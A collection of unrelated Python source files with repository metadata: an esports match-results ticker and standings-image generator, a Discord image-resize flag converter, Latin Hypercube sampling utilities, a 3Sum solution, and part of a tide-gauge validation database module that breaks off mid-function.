matchlist.append(' | ' + prepend + ' | ')
matchlist.append(key + ''.join(matches[key]))
matchstr = ''.join(matchlist)
with open('results.txt', 'w') as output:
output.write(matchstr)
print('Populated Results')
time.sleep(40)
def build_ticker_ept_cups(pageid, prepend=''):
# TODO: Generalize function to all events
# TODO: convert match_list to dictionary so we can bump less useful results
# TODO: add gui to plug in pageid
# TODO: loop every 30s to reduce user overhead
params = {
'action': "parse",
'pageid': pageid,
'prop': 'wikitext',
'format': "json",
'Accept-Encoding': 'gzip'
}
""" Parse a section of a page, fetch its table data and save it to a CSV file
"""
try:
res = S.get(url=URL, params=params, headers=HEADER)
data = res.json()
wikitext = data['parse']['wikitext']['*']
lines = wikitext.split('|-')
matches = []
rounds = {}
table = lines[0].split('==Results==')
del table[0]
table = re.split('\|R[0-9]', table[0])
prev_series = 100
round_tracker = 0
for series in table:
if '{{bracket' not in series:
if 'header' in series:
header = series.split('=')[1].split('({{')
rounds[str(header[0])] = header[1].split('|')[1].replace('}})\n', '').split('\n')[0]
elif re.search('M[0-9]', series):
round_keys = list(rounds.keys())
subseries = series.split(' ')
series_num = int(subseries[0].split('M')[1].split('=')[0])
manual_score_flag = False
p1_score = 0
p2_score = 0
for line in subseries:
if 'opponent1' in line:
if re.search('\|1=', line):
p1 = line.split('|1=')[-1].split('|')[0].replace('}}\n', '')
else:
p1 = line.split('|')[2].replace('}}\n', '')
if 'score' in line:
p1_score = line.split('score=')[1].split('}')[0]
else:
manual_score_flag = True
elif 'opponent2' in line:
if re.search('\|1=', line):
p2 = line.split('|1=')[-1].split('|')[0].replace('}}\n', '')
else:
p2 = line.split('|')[2].replace('}}\n', '')
if 'score' in line:
p2_score = line.split('score=')[1].split('}')[0]
else:
manual_score_flag = True
if 'walkover=1' in line:
p1_score = 'W'
p2_score = 'L'
elif 'walkover=2' in line:
p1_score = 'L'
p2_score = 'W'
elif manual_score_flag and 'winner' in line:
winner_id = line.split('winner=')[1].split('}')[0].partition('|')
winner_id = winner_id[0]
if winner_id == '1':
p1_score += 1
elif winner_id == '2':
p2_score += 1
if series_num < prev_series and p1 != '':
key = str(round_keys[round_tracker])
matches.append('| ' + key + ' (BO ' + rounds[key] + ') :')
round_tracker += 1
if p1_score == '':
p1_score = '0'
if p2_score == '':
p2_score = '0'
if p1 == '' and p2 != '':
p1 = 'TBD'
if p2 == '' and p1 != '':
p2 = 'TBD'
if p1 != '':
if p1 != 'BYE' and p2 != 'BYE':
matches.append(' ' + p1 + ' ' + str(p1_score) + '-' + str(p2_score) + ' ' + p2 + ' ')
elif p1 == 'BYE':
matches.append(' ' + p2 + ' (Bye) ')
elif p2 == 'BYE':
matches.append(' ' + p1 + ' (Bye) ')
prev_series = series_num
matchstr = ' '.join(matches)
if 'Quarterfinals (BO 3)' in matchstr:
matchstr = matchstr[matchstr.index('| Quarterfinals (BO 3)'):]
except:
print('Invalid ID')
matchstr = ''
if prepend != '':
prepend = ' | ' + prepend
matchstr = prepend + matchstr
while len(matchstr) < 100 and len(matchstr) != 0:
matchstr += matchstr
with codecs.open('results.txt', 'w', encoding="utf-8") as output:
output.write(matchstr)
print('Populated Results')
time.sleep(40)
def build_ticker_DH_EU_groups(pageid, prepend=''):
# TODO: Generalize function to all events
# TODO: convert match_list to dictionary so we can bump less useful results
# TODO: convert match_list to dictionary so we can bump less useful results
# TODO: add gui to plug in pageid
# TODO: loop every 30s to reduce user overhead
params = {
'action': "parse",
'pageid': pageid,
'prop': 'wikitext',
'format': "json",
'Accept-Encoding': 'gzip'
}
""" Parse a section of a page, fetch its table data and save it to a CSV file
"""
res = S.get(url=URL, params=params, headers=HEADER)
data = res.json()
wikitext = data['parse']['wikitext']['*']
lines = wikitext.split('|-')
matches = []
rounds = {}
lines = lines[-1]
lines = lines.split('Toggle group')[1]
group_table = lines.split('{{:')
new_groups = group_table[0].split('{{Matchlist')
group_names = [x.split('}')[0] for x in new_groups[1:len(new_groups)]]
prev_series = 100
round_tracker = 0
matches = {}
for group in group_names:
print(group)
time.sleep(40)
HEADER_GROUPS = {'User-Agent': f'Live Match Results Ticker {group} (beomulf@gmail.com)'}
group_params = {
'action': "parse",
'page': group,
'prop': 'wikitext',
'format': "json",
'Accept-Encoding': 'gzip'
}
res = S.get(url=URL, params=group_params, headers=HEADER_GROUPS)
data = res.json()
wikitext = data['parse']['wikitext']['*']
lines = wikitext.split('|-')
group_data = lines[-1]
player_names = re.split('\|p[0-9]=', group_data)
del player_names[0]
# if 'bg' in group:
# player_names = re.split('\|p[0-9]=', group_data)
player_names_list = [x.split('\n')[0].split('=') for x in player_names[0:8]]
player_names_list = [x[0] for x in player_names_list]
results_dict = dict.fromkeys(player_names_list)
for key in player_names_list:
results_dict[key] = {'Map Diff': 0, 'Map Wins': 0, 'Map Losses': 0, 'Match Wins': 0, 'Match Losses': 0}
table = re.split('\|M[0-9]|<', group_data)
for match in table:
if '{{HiddenSort' in match:
group_name = match.split('|')[1].split('}}')[0] + ' | '
matches[group_name] = []
elif 'header' not in match and 'opponent1' in match:
if 'bestof=5' in match:
break
date_info = match.split('|')
date = [x for x in date_info if 'date' in x]
date = date[0].split('=')[1].split('{{')
date = date[0] + re.sub('[a-z |{|}|\/]', '', date[1]).replace('\n', '')
date = date.replace('A', '')
for zone, offset in TIMEZONES.items():
try:
date = date.replace(zone, offset)
except:
print('Invalid Timezone')
date = parser.parse(date)
currentTime = datetime.datetime.now(datetime.timezone.utc).astimezone()
timeDiff = abs(currentTime - date)
timeDiff = timeDiff.days * 24 + timeDiff.seconds // 3600
subseries = match.split(' ')
manual_score_flag = False
p1_score = 0
p2_score = 0
for line in subseries:
if 'opponent1' in line:
if re.search('\|1=', line):
p1 = line.split('|1=')[-1].split('|')[0].replace('}}\n', '')
else:
p1 = line.split('|')[2].replace('}}\n', '').split('p1=')[1]
if 'score' in line:
p1_score = line.split('score=')[1].split('}')[0]
else:
manual_score_flag = True
elif 'opponent2' in line:
if re.search('\|1=', line):
p2 = line.split('|1=')[-1].split('|')[0].replace('}}\n', '')
else:
p2 = line.split('|')[2].replace('}}\n', '').split('p1=')[1]
if 'score' in line:
p2_score = line.split('score=')[1].split('}')[0]
else:
manual_score_flag = True
if 'walkover=1' in line:
p1_score = 'W'
p2_score = 'L'
elif 'walkover=2' in line:
p1_score = 'L'
p2_score = 'W'
elif manual_score_flag and 'winner' in line:
winner_id = line.split('winner=')[1].split('}')[0].partition('|')
winner_id = winner_id[0]
if winner_id == '1':
p1_score += 1
elif winner_id == '2':
p2_score += 1
if p1_score == '':
p1_score = '0'
if p2_score == '':
p2_score = '0'
results_dict[p1]['Map Wins'] += p1_score
results_dict[p2]['Map Wins'] += p2_score
results_dict[p1]['Map Losses'] += p2_score
results_dict[p2]['Map Losses'] += p1_score
results_dict[p1]['Map Diff'] += p1_score-p2_score
results_dict[p2]['Map Diff'] += p2_score-p1_score
if p1_score >= 2 or p2_score >= 2:
if p1_score > p2_score:
results_dict[p1]['Match Wins'] += 1
results_dict[p2]['Match Losses'] += 1
if p2_score > p1_score:
results_dict[p2]['Match Wins'] += 1
results_dict[p1]['Match Losses'] += 1
if timeDiff < 8:
if p1 != '':
if p1 != 'BYE' and p2 != 'BYE':
matches[group_name].append(' ' + p1 + ' ' + str(p1_score) + '-' + str(p2_score) + ' ' + p2 + ' ')
elif p1 == 'BYE':
matches[group_name].append(' ' + p2 + ' (Bye) ')
elif p2 == 'BYE':
matches[group_name].append(' ' + p1 + ' (Bye) ')
if p1 == '':
p1 = 'TBD'
if p2 == '':
p2 = 'TBD'
generate_group_standings_img(group_name, results_dict)
matchstr = ''
for key in matches.keys():
if matches[key] != []:
matchstr += key + ''.join(matches[key])
if prepend != '':
matchstr = ' | ' + prepend + ' | ' + matchstr
with open('results.txt', 'w') as output:
output.write(matchstr)
print('Populated Results')
def build_kob_ticker(mainstream_group='', offstream_group=''):
SCOPES = ['https://www.googleapis.com/auth/spreadsheets']
SPREADSHEET_ID = '1TX2a7CHmrJaaNvytF_iVUGPAD9ALnRhIJXrVjJelTDk'
creds = None
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'../KoB_Toolsuite/credentials.json', SCOPES) # here enter the name of your downloaded JSON file
creds = flow.run_local_server(port=8080)
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)
service = build('sheets', 'v4', credentials=creds)
# Call the Sheets API
sheet = service.spreadsheets()
result_input = sheet.get(spreadsheetId=SPREADSHEET_ID).execute()
values_input = result_input.get('values', [])
sheets = result_input.get('sheets', '')
sheet_names = [x.get("properties", {}).get("title") for x in sheets]
if mainstream_group == '':
return sheet_names
def generate_group_standings_img(group_name, results_dict):
img = Image.new('RGBA', (1920, 1080), color=(0, 0, 0, 0))
img2 = Image.new('RGBA', (1920, 1080), color=(0, 0, 0, 0))
fnt = ImageFont.truetype('Roboto-Bold.ttf', size=30)
d = ImageDraw.Draw(img)
d2 = ImageDraw.Draw(img2)
ordered_results = sorted(results_dict, key=lambda x: (results_dict[x]['Match Wins'] - results_dict[x]['Match Losses'],
results_dict[x]['Map Diff'],
results_dict[x]['Map Wins']))
# Player Names
d.text((1260, 370), ordered_results[7], font=fnt, fill=(255, 255, 255))
d.text((1260, 415), ordered_results[6], font=fnt, fill=(255, 255, 255))
d.text((1260, 457), ordered_results[5], font=fnt, fill=(255, 255, 255))
d.text((1260, 501), ordered_results[4], font=fnt, fill=(255, 255, 255))
d.text((1260, 545), ordered_results[3], font=fnt, fill=(255, 255, 255))
d.text((1260, 590), ordered_results[2], font=fnt, fill=(255, 255, 255))
d.text((1260, 635), ordered_results[1], font=fnt, fill=(255, 255, 255))
d.text((1260, 675), ordered_results[0], font=fnt, fill=(255, 255, 255))
# Match Score
d.text((1620, 375),
str(results_dict[ordered_results[7]]['Match Wins']) + ' - ' + str(
results_dict[ordered_results[7]]['Match Losses']),
font=fnt, fill=(255, 255, 255), anchor='mt')
d.text((1620, 420),
str(results_dict[ordered_results[6]]['Match Wins']) + ' - ' + str(
results_dict[ordered_results[6]]['Match Losses']),
font=fnt, fill=(255, 255, 255), anchor='mt')
d.text((1620, 464),
str(results_dict[ordered_results[5]]['Match Wins']) + ' - ' + str(
results_dict[ordered_results[5]]['Match Losses']),
font=fnt, fill=(255, 255, 255), anchor='mt')
d.text((1620, 509),
str(results_dict[ordered_results[4]]['Match Wins']) + ' - ' + str(
results_dict[ordered_results[4]]['Match Losses']),
font=fnt, fill=(255, 255, 255), anchor='mt')
d.text((1620, 553),
str(results_dict[ordered_results[3]]['Match Wins']) + ' - ' + str(
results_dict[ordered_results[3]]['Match Losses']),
font=fnt, fill=(255, 255, 255), anchor='mt')
d.text((1620, 597),
str(results_dict[ordered_results[2]]['Match Wins']) + ' - ' + str(
results_dict[ordered_results[2]]['Match Losses']),
font=fnt, fill=(255, 255, 255), anchor='mt')
d.text((1620, 640),
str(results_dict[ordered_results[1]]['Match Wins']) + ' - ' + str(
results_dict[ordered_results[1]]['Match Losses']),
font=fnt, fill=(255, 255, 255), anchor='mt')
d.text((1620, 683),
str(results_dict[ordered_results[0]]['Match Wins']) + ' - ' + str(
results_dict[ordered_results[0]]['Match Losses']),
font=fnt, fill=(255, 255, 255), anchor='mt')
# Map Scores
d.text((1820, 375),
str(results_dict[ordered_results[7]]['Map Wins']) + ' - ' + str(
results_dict[ordered_results[7]]['Map Losses']),
font=fnt, fill=(255, 255, 255), anchor='mt')
d.text((1820, 420),
str(results_dict[ordered_results[6]]['Map Wins']) + ' - ' + str(
results_dict[ordered_results[6]]['Map Losses']),
font=fnt, fill=(255, 255, 255), anchor='mt')
d.text((1820, 464),
str(results_dict[ordered_results[5]]['Map Wins']) + ' - ' + str(
results_dict[ordered_results[5]]['Map Losses']),
font=fnt, fill=(255, 255, 255), anchor='mt')
d.text((1820, 509),
str(results_dict[ordered_results[4]]['Map Wins']) + ' - ' + str(
results_dict[ordered_results[4]]['Map Losses']),
font=fnt, fill=(255, 255, 255), anchor='mt')
d.text((1820, 553),
str(results_dict[ordered_results[3]]['Map Wins']) + ' - ' + str(
results_dict[ordered_results[3]]['Map Losses']),
font=fnt, fill=(255, 255, 255), anchor='mt')
d.text((1820, 597),
str(results_dict[ordered_results[2]]['Map Wins']) + ' - ' + str(
results_dict[ordered_results[2]]['Map Losses']),
font=fnt, fill=(255, 255, 255), anchor='mt')
d.text((1820, 640),
str(results_dict[ordered_results[1]]['Map Wins']) + ' - ' + str(
results_dict[ordered_results[1]]['Map Losses']),
font=fnt, fill=(255, 255, 255), anchor='mt')
d.text((1820, 683),
str(results_dict[ordered_results[0]]['Map Wins']) + ' - ' + str(
results_dict[ordered_results[0]]['Map Losses']),
font=fnt, fill=(255, 255, 255), anchor='mt')
img.save(group_name.split('|')[0].replace(' ', '') + '.png')
fullscreen_start = 300
score_start = 640
maps_start = 815
# Player Names
name_vert_start = 730
num_vert_start = 735
counter = 0
for result in ordered_results:
d2.text((fullscreen_start, name_vert_start-counter*50), result, font=fnt, fill=(255, 255, 255))
d2.text((score_start, num_vert_start-counter*50),
str(results_dict[result]['Match Wins']) + ' - ' + str(results_dict[result]['Match Losses']),
font=fnt,
fill=(255, 255, 255),
anchor='mt')
d2.text((maps_start, num_vert_start-counter*50),
str(results_dict[result]['Map Wins']) + ' - ' + str(results_dict[result]['Map Losses']),
font=fnt,
fill=(255, 255, 255),
anchor='mt')
counter += 1
img2.save(group_name.split('|')[0].replace(' ', '') + '_FullScreen.png')
| Peragore/BeoCastingTools | build_ticker.py | build_ticker.py | py | 25,854 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "requests.Session",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "re.split",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "re.split",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 66,
... |
31149492786 | from enum import Enum
from typing import Optional
from discord.ext import commands
from .utils import ASPECT_RATIO_ORIGINAL
class ResizeFlagDescriptions(Enum):
height = "Flag to specify height."
width = "Flag to specify width."
aspect_ratio = f"Flag to specify width:height aspect ratio when resizing. \
Pass either of `{', '.join(ASPECT_RATIO_ORIGINAL)}` to retain the original aspect ratio of file(s). \
If either height/width flag is passed, it will resized based on it, but will not work if both are passed. \
If neither is specified, it will use the original width to resize the height."
fit = f"Flag `(yes/true)` to specify if you want the bot to fit the image to the edges by cropping away transparent surrounding areas."
center = f"Flag `(yes/true)` to specify if you want to resize image(s)' background while keeping the image centered and unwarped."
crop = f"Flag `(yes/true)` to specify if you want the bot to crop your image when resizing."
class ResizeFlags(
commands.FlagConverter, prefix="--", delimiter=" ", case_insensitive=True
):
height: Optional[int] = commands.flag(
aliases=("h",), max_args=1, description=ResizeFlagDescriptions.height.value
)
width: Optional[int] = commands.flag(
aliases=("w",), max_args=1, description=ResizeFlagDescriptions.width.value
)
ar: Optional[str] = commands.flag(
name="aspect_ratio",
aliases=("ar",),
max_args=1,
description=ResizeFlagDescriptions.aspect_ratio.value,
)
fit: Optional[bool] = commands.flag(
name="fit", max_args=1, description=ResizeFlagDescriptions.fit.value
)
center: Optional[bool] = commands.flag(
name="center",
aliases=("centre",),
max_args=1,
description=ResizeFlagDescriptions.center.value,
)
crop: Optional[bool] = commands.flag(
name="crop", max_args=1, description=ResizeFlagDescriptions.crop.value
)
| WitherredAway/Yeet | cogs/Image/utils/flags.py | flags.py | py | 1,959 | python | en | code | 16 | github-code | 1 | [
{
"api_name": "enum.Enum",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "utils.ASPECT_RATIO_ORIGINAL",
"line_number": 13,
"usage_type": "argument"
},
{
"api_name": "discord.ext.commands.FlagConverter",
"line_number": 22,
"usage_type": "attribute"
},
{
"... |
21007477247 | # -*- coding: utf-8 -*-
"""
Created on Sun Feb 14 18:50:22 2021
@author: Cillian
"""
import numpy as np
from pyDOE import lhs
def get_initial_pts(parameter_samples, parameter_ranges, criteria='center' ):
"""Get initial Latin Hypercube sample points and scale
Args:
parameter_samples (str): Number of samples required
parameter_ranges (list of lists): Each inner list contains the range of
a parameter [upper bound, lower bound]
criteria (str, optional): Latin Hypercube sampling method
"""
# Number of parameters
n = len(parameter_ranges)
# Get LHS Samples
lhs_pts = lhs(n, samples=parameter_samples, criterion=criteria)
# Scale parameters to required ranges
for i,j in enumerate(parameter_ranges):
lhs_pts[:,i] = lhs_pts[:,i]*(j[0] - j[1]) + j[1]
return( lhs_pts )
def get_grid_points(M):
"""Discretise input domain into a grid
TOOD: Make more generic. Currently only works for specific Grey-Scott bounds
Args:
M (int): Number of equally spaced points to use for each input parameter
Returns:
np array with shape (M, num_parameters )
"""
Grid_pts = np.empty((M**4,4))
i = 0
for DA in np.linspace(0.002,0.01,M) :
for DB in np.linspace(0.0001,0.001,M):
for k in np.linspace(0.01,0.1,M):
for f in np.linspace(0.1,0.2,M):
Grid_pts[i,:] = np.array([DA, DB, k ,f])
i += 1
return(Grid_pts )
def obtain_samples_GS(M, p_range = [[0.01,0.002], [0.001,0.0001],[0.1,0.01],[0.2,0.1]]):
"""Sample four input parameters from uniform distributions
Args:
M (int): Number of samples required
p_range (list of lists): Each inner list contains the range of
a parameter [upper bound, lower bound]
Returns:
np array with shape (M, num_parameters )
"""
DA = np.random.uniform(p_range[0][1],p_range[0][0],M)
DB = np.random.uniform(p_range[1][1],p_range[1][0],M)
k = np.random.uniform(p_range[2][1],p_range[2][0],M)
f = np.random.uniform(p_range[3][1],p_range[3][0],M)
return np.array([DA, DB, k,f])
| CillianHourican/CLS-Project | Deliverable 1/utils.py | utils.py | py | 2,294 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "pyDOE.lhs",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "numpy.empty",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "numpy.linspace",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "numpy.linspace",
"line_numbe... |
71015824995 | # Title: 3Sum
# Link: https://leetcode.com/problems/3sum/
from itertools import combinations
from collections import defaultdict
class Solution:
def three_sum(self, nums: list) -> list:
ans = set()
ans_dict = set()
d = defaultdict(lambda: 0)
for n in nums:
d[n] += 1
# for all diffeerent
x = sorted(d.keys())
for a, b in combinations(x, 2):
if (a, b) in ans_dict:
continue
d[a] -= 1
d[b] -= 1
if d[-a-b]:
s = sorted([a, b, -a-b])
ans.add(tuple(s))
ans_dict.add((s[0], s[1]))
ans_dict.add((s[0], s[2]))
ans_dict.add((s[1], s[2]))
d[a] += 1
d[b] += 1
# for two same
for a in x:
if d[a] >= 2:
if a > 0:
t = (-a-a, a, a)
else:
t = (a, a, -a-a)
if t not in ans:
d[a] -= 2
if d[-a-a] > 0:
ans.add(t)
return ans
def main():
solution = Solution()
nums = [-1, 0, 1, 2, -1, -4]
print(solution.three_sum(nums))
if __name__ == '__main__':
main() | yskang/AlgorithmPractice | leetCode/3_sum.py | 3_sum.py | py | 1,313 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "collections.defaultdict",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "itertools.combinations",
"line_number": 18,
"usage_type": "call"
}
] |
3584234188 | import numpy as np
import sqlite3 as sq
import datetime as dt
import subprocess as sp
import glob as gb
import os
import matplotlib.pyplot as plt
from PyFVCOM.grid import vincenty_distance
from PyFVCOM.read import FileReader
from PyFVCOM.plot import Time, Plotter
from PyFVCOM.stats import calculate_coefficient, rmse
SQL_UNIX_EPOCH = dt.datetime(1970, 1, 1, 0, 0, 0)
"""
Validation of model outputs against in situ data stored and extracted from a database.
This also includes the code to build the databases of time series data sets.
"""
class validation_db():
""" Work with an SQLite database. """
def __init__(self, db_name):
if db_name[-3:] != '.db':
db_name += '.db'
self.conn = sq.connect(db_name)
self.create_table_sql = {}
self.retrieve_data_sql = {}
self.c = self.conn.cursor()
def execute_sql(self, sql_str):
"""
Execute the given SQL statement.
Parameters
----------
sql_str : str
SQL statement to execute.
Returns
-------
results : np.ndarray
Data from the database which matches the SQL statement.
"""
self.c.execute(sql_str)
return self.c.fetchall()
def make_create_table_sql(self, table_name, col_list):
"""
Create an SQL table if no such table exists.
Parameters
----------
table_name : str
Table name to create.
col_list : list
List of column names to add to the table.
"""
create_str = 'CREATE TABLE IF NOT EXISTS ' + table_name + ' ('
for this_col in col_list:
create_str += this_col
create_str += ', '
create_str = create_str[0:-2]
create_str += ');'
self.create_table_sql['create_' + table_name] = create_str
def insert_into_table(self, table_name, data):
"""
Insert data into a table.
Parameters
----------
table_name : str
Table name into which to insert the given data.
data : np.ndarray
Data to insert into the database.
"""
no_rows = len(data)
no_cols = len(data[0])
qs_string = '('
for this_x in range(no_cols):
qs_string += '?,'
qs_string = qs_string[:-1]
qs_string += ')'
if no_rows > 1:
self.c.executemany('insert or ignore into ' + table_name + ' values ' + qs_string, data)
elif no_rows == 1:
self.c.execute('insert into ' + table_name + ' values ' + qs_string, data[0])
self.conn.commit()
def select_qry(self, table_name, where_str, select_str='*', order_by_str=None, inner_join_str=None, group_by_str=None):
"""
Extract data from the database which matches the given SQL query.
Parameters
----------
table_name : str
Table name to query.
where_str : str
Where statement.
select_str : str, optional
Optionally give a set of columns to select.
order_by_str : str, optional
Optionally give a set of columns by which to order the results.
inner_join_str : str, optional
Optionally give an inner join string.
group_by_str : str, optional
Optionally give a string by which to group the results.
Returns
-------
results : np.ndarray
The data which matches the given query.
"""
qry_string = 'select ' + select_str + ' from ' + table_name
if inner_join_str:
qry_string += ' inner join ' + inner_join_str
if where_str:
qry_string += ' where ' + where_str
if order_by_str:
qry_string += ' order by ' + order_by_str
if group_by_str:
qry_string += ' group by ' + group_by_str
return self.execute_sql(qry_string)
def close_conn(self):
""" Close the connection to the database. """
self.conn.close()
def dt_to_epochsec(time_to_convert):
"""
Convert a datetime to our SQL database epoch.
Parameters
----------
time_to_convert : datetime.datetime
Datetime to convert.
Returns
-------
epoched : int
Converted datetime (in seconds).
"""
return (time_to_convert - SQL_UNIX_EPOCH).total_seconds()
def epochsec_to_dt(time_to_convert):
"""
Parameters
----------
time_to_convert : int
Seconds in the SQL database epoch.
Return
------
unepoched : datetime.datetime.
Converted time.
"""
return SQL_UNIX_EPOCH + dt.timedelta(seconds=time_to_convert)
def plot_map(fvcom, tide_db_path, threshold=np.inf, legend=False, **kwargs):
"""
Plot the tide gauges which fall within the model domain (in space and time) defined by the given FileReader object.
Parameters
----------
fvcom : PyFVCOM.read.FileReader
FVCOM model data as a FileReader object.
tide_db_path : str
Path to the tidal database.
threshold : float, optional
Give a threshold distance (in spherical units) beyond which a gauge is considered too far away.
legend : bool, optional
Set to True to add a legend to the plot. Defaults to False.
Any remaining keyword arguments are passed to PyFVCOM.plot.Plotter.
Returns
-------
plot : PyFVCOM.plot.Plotter
The Plotter object instance for the map
"""
tide_db = db_tide(tide_db_path)
gauge_names, gauge_locations = tide_db.get_gauge_locations(long_names=True)
gauges_in_domain = []
fvcom_nodes = []
for gi, gauge in enumerate(gauge_locations):
river_index = fvcom.closest_node(gauge, threshold=threshold)
if river_index:
gauge_id, gauge_dist = tide_db.get_nearest_gauge_id(*gauge)
times, data = tide_db.get_tidal_series(gauge_id, np.min(fvcom.time.datetime), np.max(fvcom.time.datetime))
if not np.any(data):
continue
gauges_in_domain.append(gi)
fvcom_nodes.append(river_index)
plot = Plotter(fvcom, **kwargs)
fx, fy = plot.m(fvcom.grid.lon, fvcom.grid.lat)
plot.plot_field(-fvcom.grid.h)
plot.axes.plot(fx[fvcom_nodes], fy[fvcom_nodes], 'ro', markersize=3, zorder=202, label='Model')
# Add the gauge locations.
rx, ry = plot.m(gauge_locations[:, 0], gauge_locations[:, 1])
plot.axes.plot(rx, ry, 'wo', label='Gauges')
for xx, yy, name in zip(rx, ry, gauge_names[gauges_in_domain]):
plot.axes.text(xx, yy, name, fontsize=10, rotation=45, rotation_mode='anchor', zorder=203)
if legend:
plot.axes.legend(numpoints=1, scatterpoints=1, ncol=2, loc='upper center', fontsize=10)
return plot
def plot_tides(fvcom, db_name, threshold=500, figsize=(10, 10), **kwargs):
"""
Plot model and tide gauge data.
Parameters
----------
fvcom : PyFVCOM.read.FileReader
FVCOM model data as a FileReader object.
db_name : str
Database name to interrogate.
threshold : float, optional
Give a threshold distance (in spherical units) to exclude gauges too far from a model node.
figsize : tuple
Give a figure size (units are inches).
Remaining keyword arguments are passed to PyFVCOM.plot.Time.
Returns
-------
time : PyFVCOM.plot.Time
Time series plot object.
gauge_obs : dict
Dictionary with the gauge and model data.
"""
tide_db = db_tide(db_name)
# Get all the gauges in the database and find the corresponding model nodes.
gauge_names, gauge_locations = tide_db.get_gauge_locations(long_names=True)
gauge_obs = {}
gauges_in_domain = []
fvcom_nodes = []
for gi, gauge in enumerate(gauge_locations):
river_index = fvcom.closest_node(gauge, threshold=threshold)
if river_index:
current_gauge = {}
current_gauge['gauge_id'], current_gauge['gauge_dist'] = tide_db.get_nearest_gauge_id(*gauge)
current_gauge['times'], current_gauge['data'] = tide_db.get_tidal_series(current_gauge['gauge_id'],
np.min(fvcom.time.datetime),
np.max(fvcom.time.datetime))
if not np.any(current_gauge['data']):
continue
current_gauge['lon'], current_gauge['lat'] = gauge_locations[gi, :]
current_gauge['gauge_clean'] = current_gauge['data'][:, 1] == 0
current_gauge['gauge_obs_clean'] = {'times': np.copy(current_gauge['times'])[current_gauge['gauge_clean']],
'data': np.copy(current_gauge['data'])[current_gauge['gauge_clean'], 0]}
current_gauge['rescale_zeta'] = fvcom.data.zeta[:, river_index] - np.mean(fvcom.data.zeta[:, river_index])
current_gauge['rescale_gauge_obs'] = current_gauge['gauge_obs_clean']['data'] - np.mean(current_gauge['gauge_obs_clean']['data'])
current_gauge['dates_mod'] = np.isin(fvcom.time.datetime, current_gauge['gauge_obs_clean']['times'])
current_gauge['dates_obs'] = np.isin(current_gauge['gauge_obs_clean']['times'], fvcom.time.datetime)
# Skip out if we don't have any coincident data (might simply be a sampling issue) within the model
# period. We should interpolate here.
if not np.any(current_gauge['dates_mod']) or not np.any(current_gauge['dates_obs']):
continue
current_gauge['r'], current_gauge['p'] = calculate_coefficient(current_gauge['rescale_zeta'][current_gauge['dates_mod']], current_gauge['rescale_gauge_obs'][current_gauge['dates_obs']])
current_gauge['rms'] = rmse(current_gauge['rescale_zeta'][current_gauge['dates_mod']], current_gauge['rescale_gauge_obs'][current_gauge['dates_obs']])
current_gauge['std'] = np.std(current_gauge['rescale_zeta'][current_gauge['dates_mod']] - current_gauge['rescale_gauge_obs'][current_gauge['dates_obs']])
gauges_in_domain.append(gi)
fvcom_nodes.append(river_index)
name = gauge_names[gi]
gauge_obs[name] = current_gauge
del current_gauge
tide_db.close_conn() # tidy up after ourselves
# Now make a figure of all that data.
if len(gauge_obs) > 5:
cols = np.ceil(len(gauge_obs) ** (1.0 / 3)).astype(int) + 1
else:
cols = 1
rows = np.ceil(len(gauge_obs) / cols).astype(int)
fig = plt.figure(figsize=figsize)
for count, site in enumerate(sorted(gauge_obs)):
ax = fig.add_subplot(rows, cols, count + 1)
time = Time(fvcom, figure=fig, axes=ax, hold=True, **kwargs)
time.plot_line(gauge_obs[site]['rescale_zeta'], label='Model', color='k')
# We have to use the raw plot function for the gauge data as the plot_line function assumes we're using model
# data.
time.axes.plot(gauge_obs[site]['gauge_obs_clean']['times'], gauge_obs[site]['rescale_gauge_obs'], label='Gauge', color='m')
# Should add the times of the flagged data here.
time.axes.set_xlim(fvcom.time.datetime.min(), fvcom.time.datetime.max())
time.axes.set_ylim(np.min((gauge_obs[site]['rescale_gauge_obs'].min(), gauge_obs[site]['rescale_zeta'].min())),
np.max((gauge_obs[site]['rescale_gauge_obs'].max(), gauge_obs[site]['rescale_zeta'].max())))
time.axes.set_title(site)
return time, gauge_obs
def _make_normal_tide_series(h_series):
height_series = h_series - np.mean(h_series)
return height_series
class db_tide(validation_db):
""" Create a time series database and query it. """
def make_bodc_tables(self):
""" Make the complete set of empty tables for data to be inserted into (as defined in _add_sql_strings) """
# Insert information into the error flags table
self._add_sql_strings()
for this_table, this_str in self.create_table_sql.items():
self.execute_sql(this_str)
error_data = [(0, '', 'No error'), (1, 'M', 'Improbable value flagged by QC'),
(2, 'N', 'Null Value'), (3, 'T', 'Value interpolated from adjacent values')]
self.insert_into_table('error_flags', error_data)
def insert_tide_file(self, file_list):
"""
Add data from a set of files to the database.
Parameters
----------
file_list : list
List of file names.
"""
for this_file in file_list:
print('Inserting data from file: ' + this_file)
this_file_obj = bodc_annual_tide_file(this_file)
try:
site_id = self.select_qry('sites', "site_tla == '" + this_file_obj.site_tla + "'", 'site_id')[0][0]
except:
try:
current_id_max = np.max(self.select_qry('sites', None, 'site_id'))
site_id = int(current_id_max + 1)
except:
site_id = 1
site_data = [(site_id, this_file_obj.site_tla, this_file_obj.site_name, this_file_obj.lon, this_file_obj.lat, '')]
self.debug_data = site_data
self.insert_into_table('sites', site_data)
site_id_list = [site_id] * len(this_file_obj.seconds_from_ref)
table_data = list(zip(site_id_list, this_file_obj.seconds_from_ref, this_file_obj.elevation_data,
this_file_obj.elevation_flag, this_file_obj.residual_data, this_file_obj.residual_flag))
self.insert_into_table('gauge_obs', table_data)
def get_tidal_series(self, station_identifier, start_date_dt=None, end_date_dt=None):
"""
Extract a time series of tidal elevations for a given station.
Parameters
----------
station_identifier : str
Database station identifier.
start_date_dt, end_date_dt : datetime.datetime, optional
Give start and/or end times to extract from the database. If omitted, all data are returned.
Returns
-------
dates : np.ndarray
Array of datetime objects.
data : np.ndarray
Surface elevation and residuals from the database for the given station.
"""
select_str = "time_int, elevation, elevation_flag"
